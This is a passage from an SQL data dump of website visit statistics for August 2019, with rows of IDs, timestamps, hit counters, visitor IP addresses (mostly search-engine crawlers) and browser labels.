1,1,0,0,'157.55.39.192','other'),(444213,1566571963,1,1,0,0,'66.249.66.134','chrome'),(444214,1566572232,1,1,0,0,'66.249.66.138','chrome'),(444215,1566572362,1,1,0,0,'141.8.188.29','other'),(444216,1566573529,1,1,0,0,'8.29.198.25','other'),(444217,1566573603,1,1,0,0,'66.249.66.138','chrome'),(444218,1566573644,1,1,0,0,'66.249.66.66','chrome'),(444219,1566574287,1,1,0,0,'66.249.66.134','chrome'),(444220,1566574838,1,1,0,0,'178.154.200.48','other'),(444221,1566575185,1,1,0,0,'91.196.178.189','chrome'),(444222,1566575186,1,1,0,0,'13.66.139.0','other'),(444223,1566575327,1,1,0,0,'157.55.39.192','other'),(444224,1566575332,1,1,0,0,'66.249.66.134','chrome'),(444225,1566576155,1,1,0,0,'66.249.66.136','chrome'),(444226,1566576943,1,1,0,0,'66.249.66.134','chrome'),(444227,1566577990,1,1,0,0,'66.249.66.138','chrome'),(444228,1566578070,1,1,0,0,'66.249.66.66','chrome'),(444229,1566578082,1,1,0,0,'66.249.66.136','chrome'),(444230,1566578318,1,1,0,0,'157.55.39.132','other'),(444231,1566578692,1,1,0,0,'54.36.149.83','other'),(444232,1566579132,1,1,0,0,'209.17.96.178','other'),(444233,1566579274,1,1,0,0,'54.36.149.34','other'),(444234,1566579596,1,1,0,0,'54.36.149.104','other'),(444235,1566579640,1,1,0,0,'54.36.149.59','other'),(444236,1566580319,1,1,0,0,'141.8.188.29','other'),(444237,1566580548,1,1,0,0,'54.36.149.18','other'),(444238,1566580597,2,2,0,0,'66.249.66.134','chrome'),(444239,1566580705,1,1,0,0,'207.46.13.82','other'),(444240,1566580982,1,1,0,0,'66.249.66.136','chrome'),(444241,1566581015,1,1,0,0,'66.249.66.66','chrome'),(444242,1566581390,1,1,0,0,'54.36.149.93','other'),(444243,1566582024,1,1,0,0,'66.249.66.134','chrome'),(444244,1566582542,2,2,0,0,'157.55.39.74','other'),(444245,1566582557,1,1,0,0,'54.36.149.99','other'),(444246,1566582581,1,1,0,0,'8.29.198.25','other'),(444247,1566582934,1,1,0,0,'141.8.188.11','other'),(444248,1566583358,1,1,0,0,'207.46.13.82','other'),(444249,1566583441,2,2,0,0,'66.249.66.136','chrome'),(444250,1566583744,1,1,0,0,'92.112.248.24','firefox'),(444251,1566584356,1,1,0,0,'66.249.66.134','chrome'),(444252,1566584379,1,1,0,0,'8.29.198.25','other'),(444253,1566584493,1,1,0,0,'54.36.149.100','other'),(444254,1566584722,1,1,0,0,'125.167.37.9','chrome'),(444255,1566584837,2,2,0,0,'141.8.188.29','other'),(444256,1566585162,1,1,0,0,'40.77.167.109','other'),(444257,1566585514,1,1,0,0,'66.249.66.134','chrome'),(444258,1566585576,1,1,0,0,'54.36.149.106','other'),(444259,1566586018,2,2,0,0,'40.77.167.118','other'),(444260,1566586732,1,1,0,0,'207.46.13.126','other'),(444261,1566586810,1,1,0,0,'54.36.149.32','other'),(444262,1566587241,2,2,0,0,'66.249.66.138','chrome'),(444263,1566587446,1,1,0,0,'40.77.167.109','other'),(444264,1566587509,1,1,0,0,'40.77.167.118','other'),(444265,1566588356,3,3,0,0,'40.77.167.54','other'),(444266,1566588608,1,1,0,0,'66.249.66.138','chrome'),(444267,1566588858,2,2,0,0,'66.249.66.134','chrome'),(444268,1566588996,1,1,0,0,'66.249.66.136','chrome'),(444269,1566589662,1,1,0,0,'141.8.188.29','other'),(444270,1566589744,1,1,0,0,'54.36.149.37','other'),(444271,1566589872,1,1,0,0,'54.36.149.36','other'),(444272,1566590019,1,1,0,0,'54.36.149.74','other'),(444273,1566590272,2,2,0,0,'66.249.66.64','chrome'),(444274,1566590749,1,1,0,0,'54.36.149.14','other'),(444275,1566590841,3,3,0,0,'66.249.66.138','chrome'),(444276,1566591731,1,1,0,0,'141.8.188.11','other'),(444277,1566591901,1,1,0,0,'157.55.39.77','other'),(444278,1566592019,1,1,0,0,'66.249.66.134','chrome'),(444279,1566592123,1,1,0,0,'66.249.66.138','chrome'),(444280,1566592566,1,1,0,0,'207.46.13.140','other'),(444281,1566592605,1,1,0,0,'66.249.66.64','chrome'),(444282,1566592930,1,1,0,0,'66.249.66.66','chrome'),(444283,1566593036,1,1,0,0,'91.196.178.187','chrome'),(444284,1566593040,1,1,0,0,'212.92.119.23','firefox'),(444285,1566593063,1,1,0,0,'141.8.188.11','other'),(444286,1566593075,3,3,0,0,'141.8.188.29','other'),(444287,1566593176,2,2,0,0,'66.249.66.138','chrome'),(444288,1566593418,1,1,0,0,'8.29.198.26','other'),(444289,1566594621,1,1,0,0,'66.249.66.134','chrome'),(444290,1566595068,1,1,0,0,'66.249.66.66','chrome'),(444291,1566595211,1,1,0,0,'8.29.198.27','other'),(444292,1566595747,1,1,0,0,'54.36.149.75','other'),(444293,1566595978,2,2,0,0,'66.249.66.136','chrome'),(444294,1566596003,1,1,0,0,'66.249.66.66','chrome'),(444295,1566596185,1,1,0,0,'13.66.139.0','other'),(444296,1566596347,1,1,0,0,'109.173.77.115','msie'),(444297,1566596543,1,1,0,0,'66.249.66.134','chrome'),(444298,1566598272,1,1,0,0,'141.8.188.29','other'),(444299,1566598328,1,1,0,0,'54.36.149.25','other'),(444300,1566598342,1,1,0,0,'54.36.149.45','other'),(444301,1566598416,1,1,0,0,'66.249.66.136','chrome'),(444302,1566598573,1,1,0,0,'5.45.207.19','other'),(444303,1566598934,1,1,0,0,'157.55.39.77','other'),(444304,1566599457,1,1,0,0,'141.8.188.29','other'),(444305,1566599497,1,1,0,0,'157.55.39.186','other'),(444306,1566599504,1,1,0,0,'66.249.66.68','chrome'),(444307,1566599843,1,1,0,0,'66.249.66.136','chrome'),(444308,1566599955,1,1,0,0,'207.46.13.140','other'),(444309,1566600219,1,1,0,0,'66.249.66.64','chrome'),(444310,1566600259,1,1,0,0,'157.55.39.77','other'),(444311,1566600486,2,2,0,0,'66.249.66.138','chrome'),(444312,1566600538,1,1,0,0,'66.249.66.68','chrome'),(444313,1566600604,1,1,0,0,'141.8.188.29','other'),(444314,1566601048,1,1,0,0,'157.55.39.186','other'),(444315,1566601253,1,1,0,0,'66.249.66.66','chrome'),(444316,1566601774,1,1,0,0,'54.36.149.67','other'),(444317,1566602163,1,1,0,0,'66.249.66.136','chrome'),(444318,1566602998,1,1,0,0,'66.249.66.138','chrome'),(444319,1566603195,1,1,0,0,'5.45.207.79','other'),(444320,1566604256,1,1,0,0,'8.29.198.26','other'),(444321,1566604453,1,1,0,0,'66.249.66.66','chrome'),(444322,1566604752,1,1,0,0,'66.249.66.136','chrome'),(444323,1566604757,1,1,0,0,'141.8.188.29','other'),(444324,1566605051,1,1,0,0,'66.249.66.134','chrome'),(444325,1566605501,1,1,0,0,'207.46.13.140','other'),(444326,1566605692,1,1,0,0,'157.55.39.77','other'),(444327,1566606046,1,1,0,0,'8.29.198.27','other'),(444328,1566606048,1,1,0,0,'141.8.188.11','other'),(444329,1566606387,1,1,0,0,'54.36.149.79','other'),(444330,1566606808,2,2,0,0,'66.249.66.136','chrome'),(444331,1566607218,1,1,0,0,'66.249.66.66','chrome'),(444332,1566608026,1,1,0,0,'207.46.13.140','other'),(444333,1566608196,1,1,0,0,'193.106.30.99','chrome'),(444334,1566608808,1,1,0,0,'54.36.149.81','other'),(444335,1566609350,1,1,0,0,'141.8.188.29','other'),(444336,1566609444,1,1,0,0,'66.249.66.136','chrome'),(444337,1566609465,2,2,0,0,'157.55.39.77','other'),(444338,1566610810,2,2,0,0,'66.249.66.134','chrome'),(444339,1566610867,1,1,0,0,'141.8.188.29','other'),(444340,1566610999,1,1,0,0,'157.55.39.232','other'),(444341,1566611004,1,1,0,0,'66.249.66.136','chrome'),(444342,1566611871,1,1,0,0,'5.45.207.8','other'),(444343,1566612062,1,1,0,0,'157.55.39.239','other'),(444344,1566612081,1,1,0,0,'66.249.66.66','chrome'),(444345,1566612147,1,1,0,0,'66.249.66.138','chrome'),(444346,1566612240,1,1,0,0,'157.55.39.135','other'),(444347,1566612333,1,1,0,0,'141.8.188.11','other'),(444348,1566612640,1,1,0,0,'54.36.149.58','other'),(444349,1566612796,1,1,0,0,'40.77.167.110','other'),(444350,1566612866,4,4,0,0,'141.8.188.29','other'),(444351,1566614138,1,1,0,0,'66.249.66.136','chrome'),(444352,1566614605,1,1,0,0,'54.36.149.54','other'),(444353,1566614696,1,1,0,0,'157.55.39.239','other'),(444354,1566615098,1,1,0,0,'8.29.198.27','other'),(444355,1566615332,2,2,0,0,'141.8.188.11','other'),(444356,1566615355,1,1,0,0,'5.45.207.19','other'),(444357,1566615364,1,1,0,0,'54.36.149.0','other'),(444358,1566615593,1,1,0,0,'66.249.66.68','chrome'),(444359,1566615830,1,1,0,0,'157.55.39.239','other'),(444360,1566615934,2,2,0,0,'157.55.39.232','other'),(444361,1566615952,1,1,0,0,'54.36.149.2','other'),(444362,1566616187,1,1,0,0,'54.36.149.81','other'),(444363,1566616347,1,1,0,0,'54.36.149.17','other'),(444364,1566616485,3,3,0,0,'66.249.66.134','chrome'),(444365,1566616888,1,1,0,0,'8.29.198.25','other'),(444366,1566617507,1,1,0,0,'157.55.39.135','other'),(444367,1566617553,1,1,0,0,'54.36.149.49','other'),(444368,1566617732,1,1,0,0,'5.45.207.19','other'),(444369,1566617960,1,1,0,0,'54.36.149.8','other'),(444370,1566617979,1,1,0,0,'54.36.149.80','other'),(444371,1566618333,1,1,0,0,'157.55.39.232','other'),(444372,1566618430,1,1,0,0,'141.8.142.144','other'),(444373,1566618663,1,1,0,0,'54.36.149.70','other'),(444374,1566618675,2,2,0,0,'5.45.207.79','other'),(444375,1566618907,3,3,0,0,'141.8.188.29','other'),(444376,1566619054,1,1,0,0,'66.249.66.134','chrome'),(444377,1566619055,1,1,0,0,'91.209.11.236','other'),(444378,1566619235,1,1,0,0,'66.249.66.64','chrome'),(444379,1566619341,2,2,0,0,'157.55.39.232','other'),(444380,1566620315,1,1,0,0,'141.8.188.29','other'),(444381,1566620454,1,1,0,0,'66.249.66.136','chrome'),(444382,1566620748,1,1,0,0,'66.249.66.64','chrome'),(444383,1566620776,1,1,0,0,'157.55.39.232','other'),(444384,1566621962,1,1,0,0,'66.249.66.64','chrome'),(444385,1566622388,1,1,0,0,'66.249.66.138','chrome'),(444386,1566622656,1,1,0,0,'141.8.188.11','other'),(444387,1566622689,1,1,0,0,'157.55.39.135','other'),(444388,1566623422,1,1,0,0,'157.55.39.239','other'),(444389,1566623787,1,1,0,0,'66.249.66.138','chrome'),(444390,1566624036,1,1,0,0,'178.154.171.24','other'),(444391,1566625563,1,1,0,0,'37.9.113.38','other'),(444392,1566625568,1,1,0,0,'66.249.66.68','chrome'),(444393,1566625600,1,1,0,0,'109.70.100.23','other'),(444394,1566625927,1,1,0,0,'66.249.66.134','chrome'),(444395,1566625938,1,1,0,0,'8.29.198.26','other'),(444396,1566626044,1,1,0,0,'46.211.130.41','chrome'),(444397,1566626634,1,1,0,0,'141.8.188.29','other'),(444398,1566626845,2,2,0,0,'66.249.66.134','chrome'),(444399,1566627624,5,5,0,0,'66.249.66.136','chrome'),(444400,1566627723,1,1,0,0,'8.29.198.25','other'),(444401,1566627738,5,5,0,0,'66.249.66.138','chrome'),(444402,1566627747,26,26,0,0,'66.249.66.134','chrome'),(444403,1566627767,1,1,0,0,'66.249.65.212','chrome'),(444404,1566628529,1,1,0,0,'157.55.39.119','other'),(444405,1566628632,2,2,0,0,'66.249.66.136','chrome'),(444406,1566628819,1,1,0,0,'66.249.66.138','chrome'),(444407,1566629210,1,1,0,0,'66.249.66.134','chrome'),(444408,1566629841,2,2,0,0,'66.249.66.138','chrome'),(444409,1566629859,1,1,0,0,'5.45.207.80','other'),(444410,1566630196,1,1,0,0,'213.180.203.61','other'),(444411,1566630201,2,2,0,0,'66.249.66.134','chrome'),(444412,1566631334,1,1,0,0,'157.55.39.119','other'),(444413,1566631339,2,2,0,0,'157.55.39.239','other'),(444414,1566631345,2,2,0,0,'157.55.39.250','other'),(444415,1566631365,2,2,0,0,'207.46.13.165','other'),(444416,1566631472,1,1,0,0,'193.106.30.99','chrome'),(444417,1566631899,1,1,0,0,'66.249.66.136','chrome'),(444418,1566632362,1,1,0,0,'141.8.188.29','other'),(444419,1566632963,4,4,0,0,'66.249.66.136','chrome'),(444420,1566632972,1,1,0,0,'207.46.13.165','other'),(444421,1566633324,1,1,0,0,'157.55.39.239','other'),(444422,1566633623,2,2,0,0,'66.249.66.134','chrome'),(444423,1566633829,1,1,0,0,'141.8.188.11','other'),(444424,1566633832,1,1,0,0,'141.8.188.29','other'),(444425,1566634020,1,1,0,0,'66.249.66.136','chrome'),(444426,1566634259,1,1,0,0,'91.196.178.136','firefox'),(444427,1566635293,1,1,0,0,'87.250.224.81','other'),(444428,1566636069,1,1,0,0,'91.196.178.36','chrome'),(444429,1566636071,1,1,0,0,'66.249.66.138','chrome'),(444430,1566636220,1,1,0,0,'157.55.39.119','other'),(444431,1566636608,1,1,0,0,'31.13.127.16','other'),(444432,1566636670,1,1,0,0,'207.46.13.165','other'),(444433,1566636775,1,1,0,0,'8.29.198.27','other'),(444434,1566637028,2,2,0,0,'66.249.66.138','chrome'),(444435,1566638519,2,2,0,0,'66.249.66.138','chrome'),(444436,1566638536,1,1,0,0,'66.249.66.134','chrome'),(444437,1566638564,1,1,0,0,'8.29.198.27','other'),(444438,1566638617,1,1,0,0,'54.36.149.95','other'),(444439,1566638846,1,1,0,0,'207.46.13.165','other'),(444440,1566639007,1,1,0,0,'141.8.188.11','other'),(444441,1566639375,1,1,0,0,'54.36.149.100','other'),(444442,1566640480,2,2,0,0,'178.154.171.24','other'),(444443,1566640819,1,1,0,0,'157.55.39.119','other'),(444444,1566641118,10,10,0,0,'212.109.220.62','chrome'),(444445,1566641122,1,1,0,0,'66.249.66.136','chrome'),(444446,1566641199,1,1,0,0,'54.36.149.6','other'),(444447,1566641256,4,4,0,0,'212.109.220.62','other'),(444448,1566641257,1,1,0,0,'212.109.220.62','firefox'),(444450,1566641334,1,1,0,0,'109.74.154.72','chrome'),(444451,1566641445,1,1,0,0,'54.36.149.33','other'),(444452,1566641922,3,3,0,0,'66.249.66.134','chrome'),(444453,1566642926,1,1,0,0,'78.111.187.143','chrome'),(444454,1566643193,2,2,0,0,'157.55.39.119','other'),(444455,1566643599,1,1,0,0,'5.45.207.76','other'),(444456,1566643614,1,1,0,0,'87.250.224.118','other'),(444457,1566643649,1,1,0,0,'54.36.149.14','other'),(444458,1566644316,1,1,0,0,'157.55.39.119','other'),(444459,1566645105,1,1,0,0,'141.8.188.29','other'),(444460,1566645134,1,1,0,0,'54.36.149.22','other'),(444461,1566645668,1,1,0,0,'207.46.13.165','other'),(444462,1566645673,1,1,0,0,'157.55.39.119','other'),(444463,1566646195,1,1,0,0,'54.36.149.105','other'),(444464,1566646212,1,1,0,0,'54.36.149.14','other'),(444465,1566646595,1,1,0,0,'54.36.149.8','other'),(444466,1566647613,1,1,0,0,'8.29.198.26','other'),(444467,1566648136,1,1,0,0,'54.36.149.70','other'),(444468,1566648541,1,1,0,0,'40.77.167.66','other'),(444469,1566649401,1,1,0,0,'8.29.198.25','other'),(444470,1566649458,1,1,0,0,'54.36.149.7','other'),(444471,1566649550,1,1,0,0,'141.8.188.29','other'),(444472,1566650090,1,1,0,0,'54.36.149.56','other'),(444473,1566650435,1,1,0,0,'66.249.66.138','chrome'),(444474,1566650446,1,1,0,0,'66.249.66.136','chrome'),(444475,1566650572,1,1,0,0,'66.249.66.134','chrome'),(444476,1566651089,1,1,0,0,'213.180.203.53','other'),(444477,1566652661,1,1,0,0,'141.8.142.103','other'),(444478,1566653055,1,1,0,0,'157.55.39.119','other'),(444479,1566653513,1,1,0,0,'66.249.66.64','chrome'),(444480,1566653529,1,1,0,0,'78.111.189.167','chrome'),(444481,1566653581,1,1,0,0,'66.249.66.134','chrome'),(444482,1566653653,1,1,0,0,'54.36.149.52','other'),(444483,1566654048,1,1,0,0,'91.196.178.178','chrome'),(444484,1566654050,1,1,0,0,'31.13.127.10','other'),(444485,1566654094,1,1,0,0,'40.77.167.157','other'),(444486,1566654277,1,1,0,0,'157.55.39.4','other'),(444487,1566654654,1,1,0,0,'54.36.149.83','other'),(444488,1566655097,1,1,0,0,'40.77.167.157','other'),(444489,1566655645,1,1,0,0,'66.249.66.136','chrome'),(444490,1566655946,1,1,0,0,'193.106.30.99','chrome'),(444491,1566657096,2,2,0,0,'141.8.188.11','other'),(444492,1566657121,1,1,0,0,'54.36.149.28','other'),(444493,1566657292,1,1,0,0,'54.36.149.61','other'),(444494,1566657475,1,1,0,0,'40.77.167.116','other'),(444495,1566658458,1,1,0,0,'8.29.198.25','other'),(444496,1566658692,1,1,0,0,'141.8.188.29','other'),(444497,1566659233,1,1,0,0,'157.55.39.230','other'),(444498,1566659514,1,1,0,0,'51.68.152.26','chrome'),(444499,1566660094,1,1,0,0,'54.36.149.74','other'),(444500,1566660105,1,1,0,0,'207.46.13.193','other'),(444501,1566660237,1,1,0,0,'8.29.198.27','other'),(444502,1566660338,1,1,0,0,'141.8.188.29','other'),(444503,1566660752,1,1,0,0,'54.36.149.6','other'),(444504,1566661243,1,1,0,0,'141.8.142.38','other'),(444505,1566661361,1,1,0,0,'87.250.224.118','other'),(444506,1566661413,1,1,0,0,'66.249.66.136','chrome'),(444507,1566661494,1,1,0,0,'40.77.167.157','other'),(444508,1566661587,1,1,0,0,'91.196.178.171','chrome'),(444509,1566662414,1,1,0,0,'54.36.149.21','other'),(444510,1566662811,1,1,0,0,'5.45.207.79','other'),(444511,1566663403,1,1,0,0,'54.36.149.56','other'),(444512,1566663633,1,1,0,0,'54.36.149.25','other'),(444513,1566664046,1,1,0,0,'40.77.167.157','other'),(444514,1566664990,1,1,0,0,'40.77.167.157','other'),(444515,1566665411,1,1,0,0,'157.55.39.230','other'),(444516,1566665848,1,1,0,0,'54.36.149.60','other'),(444517,1566666329,2,2,0,0,'157.55.39.108','other'),(444518,1566666552,1,1,0,0,'54.36.149.104','other'),(444519,1566667608,1,1,0,0,'141.8.188.11','other'),(444520,1566667729,1,1,0,0,'54.36.149.66','other'),(444521,1566667739,1,1,0,0,'54.36.149.19','other'),(444522,1566667756,1,1,0,0,'66.249.66.66','chrome'),(444523,1566668213,1,1,0,0,'141.8.188.29','other'),(444524,1566668613,1,1,0,0,'107.179.102.58','chrome'),(444525,1566668790,1,1,0,0,'213.180.203.40','other'),(444526,1566669288,1,1,0,0,'8.29.198.27','other'),(444527,1566669604,1,1,0,0,'82.145.209.204','other'),(444528,1566669675,1,1,0,0,'157.55.39.230','other'),(444529,1566669696,1,1,0,0,'66.249.66.136','chrome'),(444530,1566669833,1,1,0,0,'91.196.178.187','chrome'),(444531,1566670301,1,1,0,0,'54.36.149.33','other'),(444532,1566670653,1,1,0,0,'141.8.188.29','other'),(444533,1566670730,1,1,0,0,'54.36.149.35','other'),(444534,1566670938,1,1,0,0,'40.77.167.83','other'),(444535,1566671083,1,1,0,0,'8.29.198.27','other'),(444536,1566671514,2,2,0,0,'66.249.66.136','chrome'),(444537,1566671764,1,1,0,0,'157.55.39.151','other'),(444538,1566671929,1,1,0,0,'66.249.66.134','chrome'),(444539,1566672392,1,1,0,0,'54.36.149.53','other'),(444540,1566672481,1,1,0,0,'54.36.149.29','other'),(444541,1566672565,1,1,0,0,'168.232.216.1','chrome'),(444542,1566673061,1,1,0,0,'54.36.149.44','other'),(444543,1566673434,1,1,0,0,'54.36.149.61','other'),(444544,1566673842,1,1,0,0,'141.8.188.29','other'),(444545,1566674000,1,1,0,0,'157.55.39.108','other'),(444546,1566674221,1,1,0,0,'54.36.149.77','other'),(444547,1566674308,1,1,0,0,'54.36.149.45','other'),(444548,1566675192,1,1,0,0,'141.8.188.29','other'),(444549,1566675205,1,1,0,0,'141.8.188.11','other'),(444550,1566676255,1,1,0,0,'66.249.66.138','chrome'),(444551,1566676473,1,1,0,0,'157.55.39.230','other'),(444552,1566676787,1,1,0,0,'91.196.178.185','chrome'),(444553,1566677613,1,1,0,0,'40.77.167.173','other'),(444554,1566677683,1,1,0,0,'94.179.209.203','chrome'),(444555,1566677710,1,1,0,0,'91.196.177.177','chrome'),(444556,1566678574,1,1,0,0,'193.106.30.99','chrome'),(444557,1566678759,1,1,0,0,'5.45.207.76','other'),(444558,1566679330,1,1,0,0,'141.8.142.162','other'),(444559,1566679591,1,1,0,0,'77.111.244.103','chrome'),(444560,1566680064,1,1,0,0,'141.8.188.29','other'),(444561,1566680078,1,1,0,0,'141.8.188.11','other'),(444562,1566680119,1,1,0,0,'8.29.198.26','other'),(444563,1566680343,1,1,0,0,'5.45.207.79','other'),(444564,1566680451,1,1,0,0,'207.46.13.58','other'),(444565,1566680566,1,1,0,0,'66.249.66.138','chrome'),(444566,1566680710,1,1,0,0,'40.77.167.132','other'),(444567,1566680991,1,1,0,0,'40.77.167.31','other'),(444568,1566681136,1,1,0,0,'54.36.149.36','other'),(444569,1566681763,1,1,0,0,'141.8.188.29','other'),(444570,1566681914,1,1,0,0,'8.29.198.25','other'),(444571,1566682089,1,1,0,0,'54.36.149.24','other'),(444572,1566682644,1,1,0,0,'141.8.142.103','other'),(444573,1566683109,2,2,0,0,'141.8.188.29','other'),(444574,1566683205,1,1,0,0,'54.36.149.20','other'),(444575,1566683414,1,1,0,0,'40.77.167.31','other'),(444576,1566684390,1,1,0,0,'207.46.13.58','other'),(444577,1566684432,1,1,0,0,'40.77.167.31','other'),(444578,1566684649,1,1,0,0,'91.196.178.100','chrome'),(444579,1566685252,1,1,0,0,'66.249.66.136','chrome'),(444580,1566685782,1,1,0,0,'213.180.203.61','other'),(444581,1566686275,1,1,0,0,'91.196.177.8','chrome'),(444582,1566686366,1,1,0,0,'54.36.149.41','other'),(444583,1566686576,1,1,0,0,'54.36.149.15','other'),(444584,1566686765,1,1,0,0,'54.36.149.74','other'),(444585,1566687789,1,1,0,0,'94.231.182.113','chrome'),(444586,1566688813,1,1,0,0,'54.36.149.11','other'),(444587,1566689203,1,1,0,0,'54.36.149.73','other'),(444588,1566690026,1,1,0,0,'51.255.65.46','other'),(444589,1566690321,1,1,0,0,'141.8.188.11','other'),(444590,1566690603,1,1,0,0,'66.249.66.134','chrome'),(444591,1566690957,1,1,0,0,'8.29.198.26','other'),(444592,1566691612,1,1,0,0,'66.249.66.134','chrome'),(444593,1566691698,1,1,0,0,'213.180.203.53','other'),(444594,1566691823,1,1,0,0,'54.36.149.61','other'),(444595,1566692750,1,1,0,0,'8.29.198.25','other'),(444596,1566692765,1,1,0,0,'54.36.149.14','other'),(444597,1566693310,1,1,0,0,'54.36.149.57','other'),(444598,1566693420,2,2,0,0,'66.249.66.136','chrome'),(444599,1566693572,1,1,0,0,'66.249.66.134','chrome'),(444600,1566693700,1,1,0,0,'95.108.213.4','other'),(444601,1566694190,1,1,0,0,'207.46.13.56','other'),(444602,1566694805,1,1,0,0,'91.209.11.236','other'),(444603,1566696569,1,1,0,0,'141.8.183.22','other'),(444604,1566697207,2,2,0,0,'207.46.13.126','other'),(444605,1566697377,1,1,0,0,'207.46.13.56','other'),(444606,1566698100,2,2,0,0,'40.77.167.109','other'),(444607,1566698648,1,1,0,0,'13.66.139.0','other'),(444608,1566699268,1,1,0,0,'141.8.142.65','other'),(444609,1566699571,1,1,0,0,'13.66.139.0','other'),(444610,1566699910,1,1,0,0,'207.46.13.126','other'),(444611,1566700088,1,1,0,0,'207.46.13.221','other'),(444612,1566700990,1,1,0,0,'193.106.30.99','chrome'),(444613,1566701376,1,1,0,0,'66.249.66.134','chrome'),(444614,1566701781,1,1,0,0,'8.29.198.25','other'),(444615,1566701940,1,1,0,0,'5.45.207.19','other'),(444616,1566702474,1,1,0,0,'35.165.145.100','other'),(444617,1566702898,2,2,0,0,'188.163.98.207','chrome'),(444618,1566703059,1,1,0,0,'207.241.229.224','other'),(444619,1566703080,1,1,0,0,'207.241.229.225','other'),(444620,1566703363,1,1,0,0,'207.46.13.126','other'),(444621,1566703441,1,1,0,0,'207.46.13.56','other'),(444622,1566703582,1,1,0,0,'8.29.198.25','other'),(444623,1566704444,1,1,0,0,'5.3.155.196','msie'),(444624,1566705164,2,2,0,0,'66.249.66.64','chrome'),(444625,1566705987,1,1,0,0,'66.249.66.134','chrome'),(444626,1566706941,1,1,0,0,'207.46.13.126','other'),(444627,1566707843,1,1,0,0,'141.8.188.29','other'),(444628,1566710059,1,1,0,0,'66.249.66.134','chrome'),(444629,1566710377,1,1,0,0,'66.249.66.138','chrome'),(444630,1566711294,1,1,0,0,'66.249.66.136','chrome'),(444631,1566711634,1,1,0,0,'66.249.66.134','chrome'),(444632,1566712609,1,1,0,0,'8.29.198.27','other'),(444633,1566713155,1,1,0,0,'66.249.66.138','chrome'),(444634,1566713195,2,2,0,0,'40.77.167.29','other'),(444635,1566713693,1,1,0,0,'46.211.69.203','chrome'),(444636,1566714411,1,1,0,0,'8.29.198.25','other'),(444637,1566714661,1,1,0,0,'46.211.43.105','chrome'),(444638,1566715024,1,1,0,0,'66.249.66.68','chrome'),(444639,1566715667,1,1,0,0,'46.211.43.105','chrome'),(444640,1566715882,1,1,0,0,'66.249.66.138','chrome'),(444641,1566716099,2,2,0,0,'66.249.66.136','chrome'),(444642,1566717385,1,1,0,0,'5.45.207.19','other'),(444643,1566717794,2,2,0,0,'141.8.188.29','other'),(444644,1566717849,2,2,0,0,'40.77.167.29','other'),(444645,1566717858,1,1,0,0,'207.46.13.43','other'),(444646,1566718689,1,1,0,0,'141.8.188.11','other'),(444647,1566719004,1,1,0,0,'66.249.66.134','chrome'),(444648,1566719222,1,1,0,0,'157.55.39.255','other'),(444649,1566720309,1,1,0,0,'141.8.188.29','other'),(444650,1566721245,1,1,0,0,'91.209.11.236','other'),(444651,1566721641,1,1,0,0,'141.8.188.29','other'),(444652,1566722125,2,2,0,0,'157.55.39.154','other'),(444653,1566722366,1,1,0,0,'40.77.167.29','other'),(444654,1566722665,1,1,0,0,'141.8.188.29','other'),(444655,1566723461,1,1,0,0,'8.29.198.27','other'),(444656,1566723606,1,1,0,0,'141.8.188.29','other'),(444657,1566723607,1,1,0,0,'141.8.188.11','other'),(444658,1566723697,1,1,0,0,'107.179.102.58','chrome'),(444659,1566723771,1,1,0,0,'193.106.30.99','chrome'),(444660,1566725042,1,1,0,0,'66.249.66.136','chrome'),(444661,1566725251,1,1,0,0,'8.29.198.26','other'),(444662,1566725638,1,1,0,0,'66.249.66.138','chrome'),(444663,1566725862,1,1,0,0,'141.8.188.11','other'),(444664,1566725933,2,2,0,0,'141.8.188.29','other'),(444665,1566726036,1,1,0,0,'207.46.13.10','other'),(444666,1566726107,1,1,0,0,'66.249.66.134','chrome'),(444667,1566727406,1,1,0,0,'46.211.109.140','chrome'),(444668,1566727473,1,1,0,0,'66.249.66.136','chrome'),(444669,1566727509,1,1,0,0,'109.74.154.72','chrome'),(444670,1566727729,1,1,0,0,'40.77.167.158','other'),(444671,1566728020,1,1,0,0,'141.8.188.11','other'),(444672,1566728589,1,1,0,0,'207.46.13.43','other'),(444673,1566728789,1,1,0,0,'58.250.125.109','other'),(444674,1566731017,1,1,0,0,'40.77.167.27','other'),(444675,1566731442,2,2,0,0,'40.77.167.117','other'),(444676,1566731506,1,1,0,0,'207.46.13.43','other'),(444677,1566732571,1,1,0,0,'66.249.66.64','chrome'),(444678,1566734297,1,1,0,0,'8.29.198.26','other'),(444679,1566734983,2,2,0,0,'40.77.167.175','other'),(444680,1566735252,1,1,0,0,'40.77.167.43','other'),(444681,1566735347,2,2,0,0,'40.77.167.27','other'),(444682,1566736081,1,1,0,0,'8.29.198.27','other'),(444683,1566738444,1,1,0,0,'40.77.167.43','other'),(444684,1566738611,1,1,0,0,'141.8.188.29','other'),(444685,1566739299,1,1,0,0,'40.77.167.33','other'),(444686,1566739401,1,1,0,0,'66.249.66.136','chrome'),(444687,1566739519,14,14,0,0,'35.173.48.224','other'),(444688,1566740371,1,1,0,0,'157.55.39.58','other'),(444689,1566740449,10,10,0,0,'35.173.48.224','other'),(444690,1566741446,12,12,0,0,'35.173.48.224','other'),(444691,1566741545,1,1,0,0,'66.249.66.64','chrome'),(444692,1566742126,1,1,0,0,'5.45.207.79','other'),(444693,1566742234,1,1,0,0,'157.55.39.63','other'),(444694,1566742550,10,10,0,0,'35.173.48.224','other'),(444695,1566742953,1,1,0,0,'40.77.167.206','other'),(444696,1566743452,18,18,0,0,'35.173.48.224','other'),(444697,1566743965,1,1,0,0,'157.55.39.254','other'),(444698,1566744389,7,7,0,0,'35.173.48.224','other'),(444699,1566744580,1,1,0,0,'5.45.207.19','other'),(444700,1566744677,1,1,0,0,'40.77.167.33','other'),(444701,1566745134,1,1,0,0,'8.29.198.25','other'),(444702,1566745291,13,13,0,0,'35.173.48.224','other'),(444703,1566745316,1,1,0,0,'66.249.66.138','chrome'),(444704,1566746251,1,1,0,0,'91.209.11.236','other'),(444705,1566746343,1,1,0,0,'157.55.39.63','other'),(444706,1566746913,1,1,0,0,'8.29.198.25','other'),(444707,1566747434,1,1,0,0,'66.249.66.136','chrome'),(444708,1566748026,1,1,0,0,'40.77.167.138','other'),(444709,1566748184,1,1,0,0,'91.196.178.168','chrome'),(444710,1566748328,1,1,0,0,'66.249.66.134','chrome'),(444711,1566748841,1,1,0,0,'157.55.39.255','other'),(444712,1566749770,1,1,0,0,'77.74.177.114','chrome'),(444713,1566750322,2,2,0,0,'40.77.167.33','other'),(444714,1566750419,1,1,0,0,'37.9.113.103','other'),(444715,1566750508,1,0,1,0,'87.98.145.188',''),(444716,1566751051,1,1,0,0,'66.249.66.136','chrome'),(444717,1566751429,1,1,0,0,'141.8.188.29','other'),(444718,1566752304,1,1,0,0,'66.249.66.66','chrom